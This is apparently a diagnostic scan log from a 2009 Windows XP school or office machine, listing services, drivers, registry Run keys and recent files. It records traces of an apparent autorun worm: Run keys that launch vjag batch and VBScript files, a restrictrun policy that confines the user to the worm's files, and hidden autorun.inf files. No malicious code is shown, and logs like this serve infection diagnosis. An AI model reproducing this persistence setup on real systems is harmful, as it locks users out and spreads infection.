[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
[2007/11/02 05:48:34 | 02,090,248 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
[2007/11/02 05:48:40 | 03,990,792 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\desktop\powerpnt.exe.exe

========== (O23) Win32 Services ==========

[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe -- (Apple Mobile Device [Auto | Running])
[2007/10/24 01:47:22 | 00,033,800 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe -- (aspnet_state [On_Demand | Stopped])
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe -- (BcmSqlStartupSvc [Auto | Running])
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe -- (Bonjour Service [Auto | Running])
[2007/10/24 01:47:40 | 00,070,144 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32 [On_Demand | Stopped])
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe -- (dkab_device [On_Demand | Stopped])
[2007/10/09 12:58:12 | 00,036,864 | ---- | M] (Microsoft Corporation) -- c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe -- (FontCache3.0.0.0 [On_Demand | Stopped])
[2007/10/11 09:55:10 | 00,864,256 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe -- (idsvc [Unknown | Stopped])
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe -- (iPod Service [On_Demand | Running])
[2009/03/09 05:19:15 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe -- (JavaQuickStarterService [Auto | Running])
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE -- (MDM [Auto | Running])
[2008/11/24 22:31:10 | 29,263,712 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe -- (MSSQL$MSSMLBIZ [On_Demand | Running])
[2008/11/24 22:31:08 | 00,045,408 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe -- (MSSQLServerADHelper [Disabled | Stopped])
[2007/10/11 09:55:14 | 00,122,880 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe -- (NetTcpPortSharing [Disabled | Stopped])
[2007/08/24 03:19:12 | 00,443,776 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE -- (odserv [On_Demand | Stopped])
[2006/10/26 14:03:08 | 00,145,184 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE -- (ose [On_Demand | Stopped])
[2008/10/27 09:14:03 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe -- (SAVAdminService [Unknown | Running])
[2008/09/24 15:52:08 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe -- (SAVService [Unknown | Running])
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe -- (SMART Board Service [Auto | Running])
[2007/11/02 05:48:58 | 00,767,240 | ---- | M] () -- C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe -- (SMART Web Server [On_Demand | Stopped])
[2009/04/02 05:00:20 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe -- (Sophos Agent [Auto | Running])
[2009/01/28 07:24:29 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe -- (Sophos AutoUpdate Service [Auto | Running])
[2009/04/02 05:00:33 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe -- (Sophos Device Control Service [Unknown | Running])
[2009/04/02 05:00:16 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe -- (Sophos Message Router [Auto | Running])
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe -- (SQLBrowser [Auto | Running])
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe -- (SQLWriter [Auto | Running])
[2008/08/07 14:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe -- (UAService [Auto | Running])
[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend [Auto | Running])
[2006/10/18 20:05:24 | 00,913,408 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc [On_Demand | Stopped])

========== Driver Services ==========

[2005/03/17 16:30:10 | 00,132,608 | ---- | M] (Broadcom Corporation) -- C:\WINDOWS\system32\drivers\b57xp32.sys -- (b57w2k [On_Demand | Running])
[2004/12/13 16:14:00 | 00,039,904 | ---- | M] (Adaptec, Inc.) -- C:\WINDOWS\System32\drivers\cercsr6.sys -- (cercsr6 [Boot | Stopped])
[2008/01/29 12:01:28 | 00,016,168 | ---- | M] (GEAR Software Inc.) -- C:\WINDOWS\system32\drivers\GEARAspiWDM.sys -- (GEARAspiWDM [On_Demand | Running])
[2005/10/14 15:15:18 | 01,302,812 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\drivers\ialmnt5.sys -- (ialm [On_Demand | Running])
[2008/04/14 00:09:50 | 00,014,592 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\drivers\kbdhid.sys -- (kbdhid [System | Running])
[2007/04/02 16:02:02 | 00,072,576 | ---- | M] (Mars Semiconductor Corp.) -- C:\WINDOWS\system32\drivers\marsqx5.sys -- (marsqx5 [On_Demand | Stopped])
[2004/08/04 05:00:00 | 00,017,792 | ---- | M] (Parallel Technologies, Inc.) -- C:\WINDOWS\system32\drivers\ptilink.sys -- (Ptilink [On_Demand | Running])
[2009/02/26 06:02:37 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccesscontrol.sys -- (SAVOnAccessControl [System | Running])
[2009/02/26 06:02:48 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\savonaccessfilter.sys -- (SAVOnAccessFilter [System | Running])
[2007/11/13 05:25:53 | 00,020,480 | ---- | M] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) -- C:\WINDOWS\system32\drivers\secdrv.sys -- (Secdrv [On_Demand | Stopped])
[2004/09/17 09:02:54 | 00,732,928 | ---- | M] (Creative Technology Ltd.) -- C:\WINDOWS\system32\drivers\senfilt.sys -- (senfilt [On_Demand | Running])
[2005/01/27 15:31:06 | 00,260,352 | ---- | M] (Analog Devices, Inc.) -- C:\WINDOWS\system32\drivers\smwdm.sys -- (smwdm [On_Demand | Running])
[2008/09/24 18:09:37 | 00,014,976 | ---- | M] (Sophos Plc) -- C:\WINDOWS\system32\drivers\SophosBootDriver.sys -- (SophosBootDriver [Disabled | Stopped])

========== (R ) Internet Explorer ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"=http://www.vview.net
"Default_Search_URL"=http://go.microsoft.com/fwlink/?LinkId=54896
"Default_Secondary_Page_URL"=
"Extensions Off Page"=about:NoAdd-ons
"Local Page"=%SystemRoot%\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Security Risk Page"=about:SecurityRisk
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm
"SearchAssistant"=http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchasst.htm

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\Main]

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Internet Explorer\Main]
"Local Page"=C:\WINDOWS\system32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{CFBFAE00-17A6-11D0-99CB-00C04FD64497}" (HKLM) -- C:\WINDOWS\system32\ieframe.dll (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = 0

========== (O1) Hosts File ==========

HOSTS File = (734 bytes) - C:\WINDOWS\System32\drivers\etc\Hosts
First 25 entries...
127.0.0.1 localhost

========== (O2) BHO's ==========

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (HKLM) -- C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
{201f27d4-3704-41d6-89c1-aa35e39143ed} (HKLM) -- C:\Program Files\AskBarDis\bar\bin\askBar.dll ()
{39EA7695-B3F2-4C44-A4BC-297ADA8FD235} (HKLM) -- C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll (Sophos Plc)
{53707962-6F74-2D53-2644-206D7942484F} (HKLM) -- C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
{67BCF957-85FC-4036-8DC4-D4D80E00A77B} (HKLM) -- C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll (SMART Technologies Inc.)
{DBC80044-A445-435b-BC74-9C25C1C588A9} (HKLM) -- C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
{E7E6F031-17CE-4C07-BC86-EABFE594F69C} (HKLM) -- C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)

========== (O3) Toolbars ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar]
"{3041d03e-fd4b-44e0-b742-2d9b88305f98}" (HKLM) -- C:\Program Files\AskBarDis\bar\bin\askBar.dll ()

========== (O4) Run Keys ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Speed Launcher"="C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" (Adobe Systems Incorporated)
"igfxhkcmd"=C:\WINDOWS\system32\hkcmd.exe (Intel Corporation)
"igfxpers"=C:\WINDOWS\system32\igfxpers.exe (Intel Corporation)
"igfxtray"=C:\WINDOWS\system32\igfxtray.exe (Intel Corporation)
"ISUSPM Startup"=C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup (InstallShield Software Corporation)
"ISUSScheduler"="C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start (InstallShield Software Corporation)
"iTunesHelper"="C:\Program Files\iTunes\iTunesHelper.exe" (Apple Inc.)
"PDVDDXSrv"="C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe" (CyberLink Corp.)
"SoundMAXPnP"=C:\Program Files\Analog Devices\Core\smax4pnp.exe (Analog Devices, Inc.)
"SunJavaUpdateSched"="C:\Program Files\Java\jre6\bin\jusched.exe" (Sun Microsystems, Inc.)
"vjag"=C:\WINDOWS\system32\auto\vjag3.bat ()
"vjag2"=C:\WINDOWS\system32\auto\vjag.vbs ()
"Windows Defender"="C:\Program Files\Windows Defender\MSASCui.exe" -hide (Microsoft Corporation)

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DWQueuedReporting"="C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)

========== (O4) RunOnce Keys ==========

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"RunNarrator"=Narrator.exe (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"RunNarrator"=Narrator.exe (Microsoft Corporation)

========== (O4) Startup Folders ==========

[2009/01/28 07:24:29 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe

========== (O6 & O7) Current Version Policies ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"HonorAutoRunSetting"=1

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"HideStartupScripts"=0

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145
"Restrictrun"=1

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-1115\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\restrictrun]
"1"=vjag.vbs
"2"=C:\WINDOWS\system32\notepad.exe -- [2008/04/14 05:42:30 | 00,069,120 | ---- | M] (Microsoft Corporation)
"3"=winword.exe
"4"=C:\WINDOWS\explorer.exe -- [2008/04/14 05:42:20 | 01,033,728 | ---- | M] (Microsoft Corporation)
"5"=powerpnt.exe
"6"=vj.doc
"7"=excel.exe
"8"=vjag1.bat
"9"=vjag2.vbs
"10"=vjag.bat
"11"=vjag2.bat
"12"=vstart.bat
"13"=autorun.inf
"14"=C:\WINDOWS\system32\vjag.doc -- [2009/04/01 08:54:10 | 00,001,844 | -HS- | M] ()

[HKEY_USERS\S-1-5-21-3925025582-4110435278-4136060888-500\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"NoDriveTypeAutoRun"=145

========== (O9) IE Extensions ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
{92780B25-18CC-41C8-B9BE-3C9C571A8263}: Button: Research -- %ProgramFiles%\Microsoft Office\Office12\REFIEBAR.DLL [2006/10/26 20:12:22 | 00,040,424 | ---- | M] (Microsoft Corporation)
{DFB852A3-47F8-48C4-A200-58CAB36FD2A2}: Menu: Spybot - Search && Destroy Configuration -- %ProgramFiles%\Spybot - Search & Destroy\SDHelper.dll [2009/01/26 15:31:02 | 01,879,896 | ---- | M] (Safer Networking Limited)
{e2e2dd38-d088-4134-82b7-f2ba38496583}: Menu: @xpsp3res.dll,-20001 -- %SystemRoot%\network diagnostic\xpnetdiag.exe [2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Button: Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)
{FB5F1910-F110-11d2-BB9E-00C04F795683}: Menu: Windows Messenger -- %ProgramFiles%\Messenger\msmsgs.exe [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
CmdMapping\\{FB5F1910-F110-11d2-BB9E-00C04F795683} [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Messenger] -> [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\Extensions\]
CmdMapping\\{FB5F1910-F110-11d2-BB9E-00C04F795683} [HKLM] -> %ProgramFiles%\Messenger\msmsgs.exe [Messenger] -> [2008/04/14 05:42:30 | 01,695,232 | -HS- | M] (Microsoft Corporation)

========== (O12) Internet Explorer Plugins ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\]
PluginsPage: "" = http://activex.microsoft.com/controls/find...=%s&mime=%s
PluginsPageFriendlyName: "" = Microsoft ActiveX Gallery

========== (O13) Default Prefixes ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
""=http://

========== (O15) Trusted Sites ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\]
1 domain(s) and sub-domain(s) not assigned to a zone.

========== (O16) DPF ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\]
{166B1BCA-3F9C-11CF-8075-444553540000}: http://fpdownload.macromedia.com/get/shock...director/sw.cab -- Shockwave ActiveX Control
{6414512B-B978-451D-A0D8-FCFDF33E833C}: http://www.update.microsoft.com/windowsupd...b?1207692023140 -- WUWebControl Class
{8AD9C840-044E-11D1-B3E9-00805F499D93}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13
{8FFBE65D-2C9C-4669-84BD-5829DC0B603C}: http://fpdownload.macromedia.com/get/flash...t/ultrashim.cab -- Reg Error: Key does not exist or could not be opened.
{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Reg Error: Key does not exist or could not be opened.
{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13
{CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}: http://java.sun.com/update/1.6.0/jinstall-...indows-i586.cab -- Java Plug-in 1.6.0_13

========== (O17) DNS Name Servers ==========

{29FD7304-5CDF-4582-9D6B-1D5C0F2E5860} (Servers: | Description: )
{346168FD-2809-4FCB-832C-E763CD35D89D} (Servers: | Description: Broadcom NetXtreme 57xx Gigabit Controller)

========== (O20) AppInit_DLLs ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_Dlls"=C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
>[2009/04/02 05:00:31 | 00,164,864 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sophos_detoured.dll

========== (O20) Winlogon Notify Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\]
igfxcui: "DllName" = igfxdev.dll -- C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)

========== Shell Execute Hooks ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{091EB208-39DD-417D-A5DD-7E2C2D8FB9CB}" (HKLM) -- C:\Program Files\Windows Defender\MpShHook.dll (Microsoft Corporation)

========== Safeboot Options ==========

"AlternateShell"=cmd.exe

========== CDRom AutoRun Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom]
"AutoRun" = 1

========== Autorun Files on Drives ==========

auto []
[2009/03/20 08:56:44 | 00,000,000 | -HSD | M] -- C:\auto -- [ NTFS ]

AUTOEXEC.BAT []
[2008/04/08 16:45:12 | 00,000,000 | ---- | M] () -- C:\AUTOEXEC.BAT -- [ NTFS ]
Unable to obtain root file information for disk C:\

autorun.inf [[autorun] | shell=open | ]
[2001/06/19 06:18:46 | 00,000,021 | R--- | M] () -- D:\autorun.inf -- [ CDFS ]

========== MountPoints2 ==========

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{eea0ca55-325e-11dd-9de7-806d6172696f}\Shell]
""=Autorun

========== Files/Folders - Created Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 14:59:20 | 00,401,720 | ---- | C] (Trend Micro Inc.) -- C:\HiJackThis.exe.exe
[2009/04/02 14:57:18 | 00,422,912 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\administrator.VVIEW\Desktop\powerpnt.exe.exe
[2009/04/01 13:49:56 | 04,840,017 | ---- | C] () -- C:\Documents and Settings\administrator.VVIEW\Desktop\Virus Script.rtf
[2009/04/01 13:34:39 | 00,000,000 | -H-D | C] -- C:\WINDOWS\System32\GroupPolicy
[2009/04/01 10:06:40 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Sun
[2009/04/01 09:50:54 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\GlarySoft
[2009/04/01 09:49:15 | 00,000,000 | ---D | C] -- C:\Program Files\AskBarDis
[2009/04/01 09:49:15 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Mozilla
[2009/04/01 09:42:37 | 00,000,410 | ---- | C] () -- C:\WINDOWS\tasks\Schedule Task Weekly.job
[2009/04/01 09:42:31 | 00,000,000 | ---D | C] -- C:\Program Files\Registry Easy
[2009/04/01 09:15:17 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Auslogics
[2009/04/01 09:05:24 | 00,000,000 | ---- | C] () -- C:\WINDOWS\System32\MSVolume.dll
[2009/04/01 09:05:20 | 00,000,000 | ---D | C] -- C:\Program Files\Registry_Cleaner_Pro
[2009/04/01 09:02:08 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\TEMP
@Alternate Data Stream - 116 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:D1B5B4F1
[2009/04/01 09:02:00 | 00,000,000 | ---D | C] -- C:\Program Files\Registry Mechanic
[2009/04/01 08:54:48 | 00,000,162 | -H-- | C] () -- C:\WINDOWS\System32\~$vjag.doc
[2009/04/01 08:18:36 | 00,000,000 | ---D | C] -- C:\Program Files\Spybot - Search & Destroy
[2009/04/01 08:18:36 | 00,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
[2009/04/01 08:00:27 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Macromedia
[2009/04/01 07:57:50 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\Adobe
[2009/03/31 16:26:03 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Local Settings\Application Data\Sophos
[2009/03/31 16:25:00 | 00,000,000 | ---D | C] -- C:\Documents and Settings\administrator.VVIEW\Application Data\U3
[2009/03/20 09:03:58 | 02,442,498 | -HS- | C] () -- C:\autorun.inf
[2009/03/20 08:57:33 | 00,000,000 | -HSD | C] -- C:\auto
[2009/03/20 08:56:46 | 00,001,844 | -HS- | C] () -- C:\WINDOWS\System32\vjag.doc
[2009/03/20 08:56:44 | 00,000,000 | RHSD | C] -- C:\WINDOWS\System32\auto
[2009/03/20 08:56:12 | 00,021,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\hidserv.dll
[2009/03/20 08:56:12 | 00,021,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\hidserv.dll
[2009/03/20 08:56:06 | 00,032,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\drivers\usbccgp.sys
[2009/03/20 08:56:06 | 00,032,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\usbccgp.sys
[2009/03/06 13:11:08 | 00,000,000 | ---D | C] -- C:\Library
[2009/03/06 13:10:37 | 00,000,000 | ---D | C] -- C:\Program Files\PEM
[2009/03/06 13:10:32 | 00,000,000 | -H-D | C] -- C:\Program Files\Zero G Registry
[2009/03/06 13:10:32 | 00,000,000 | ---D | C] -- C:\Program Files\TestNav
[2009/02/11 16:01:29 | 00,000,000 | ---D | C] -- C:\WINDOWS\SQL9_KB960089_ENU

========== Files - Modified Within 60 Days ==========

[1 C:\WINDOWS\System32\*.tmp files]
[6 C:\WINDOWS\*.tmp files]
[2009/04/02 15:05:50 | 02,442,498 | -HS- | M] () -- C:\autorun.inf
[2009/04/02 14:55:44 | 00,000,402 | ---- | M] () -- C:\WINDOWS\tasks\gpupdate.job
[2009/04/02 14:55:42 | 00,002,206 | ---- | M] () -- C:\WINDOWS\System32\wpa.dbl
[2009/04/02 14:55:17 | 00,000,330 | -H-- | M] () -- C:\WINDOWS\tasks\MP Scheduled Scan.job
[2009/04/02 14:51:54 | 00,000,006 | -H-- | M] () -- C:\WINDOWS\tasks\SA.DAT
